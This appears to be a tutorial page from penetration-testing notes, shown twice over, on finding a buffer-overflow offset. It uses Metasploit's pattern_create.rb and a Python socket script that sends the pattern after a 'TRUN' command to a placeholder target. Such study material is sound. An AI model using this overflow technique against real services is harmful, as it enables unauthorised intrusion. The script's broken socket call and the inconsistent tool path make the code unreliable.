Finding the Offset

Metasploit provides a tool to do this already, found at /usr/share/metasploit-framework/tools/exploit/pattern_create.rb in kali
Using the number found during our fuzzing, pass that value to this tool: /usr/share/metasploit_framework/tools/exploit/pattern_create.rb -l NUMBER
You will get back a random string of characters which then you can add back to the fuzzing script, so now it will look something like this:

#!/usr/bin/python3
import sys, socket

# This string is what we get back from the pattern_create.rb tool
offset = "RANDOM_STRING"

try:
	s=socket.socket(socket.AF_INETsocket.SOCK_STREAM)
	s.connect(('TARGET_IP', PORT))
	s.send(('TRUN /.:/' + offset))
	s.close()

except: 
	print("Error connecting to server")
	sys.exit()

PreviousBuffer Overflows NextSpiking

Last updated 11 months ago

Finding the Offset

Metasploit provides a tool to do this already, found at /usr/share/metasploit-framework/tools/exploit/pattern_create.rb in kali
Using the number found during our fuzzing, pass that value to this tool: /usr/share/metasploit_framework/tools/exploit/pattern_create.rb -l NUMBER
You will get back a random string of characters which then you can add back to the fuzzing script, so now it will look something like this:

#!/usr/bin/python3
import sys, socket

# This string is what we get back from the pattern_create.rb tool
offset = "RANDOM_STRING"

try:
	s=socket.socket(socket.AF_INETsocket.SOCK_STREAM)
	s.connect(('TARGET_IP', PORT))
	s.send(('TRUN /.:/' + offset))
	s.close()

except: 
	print("Error connecting to server")
	sys.exit()

PreviousBuffer Overflows NextSpiking

Last updated 11 months ago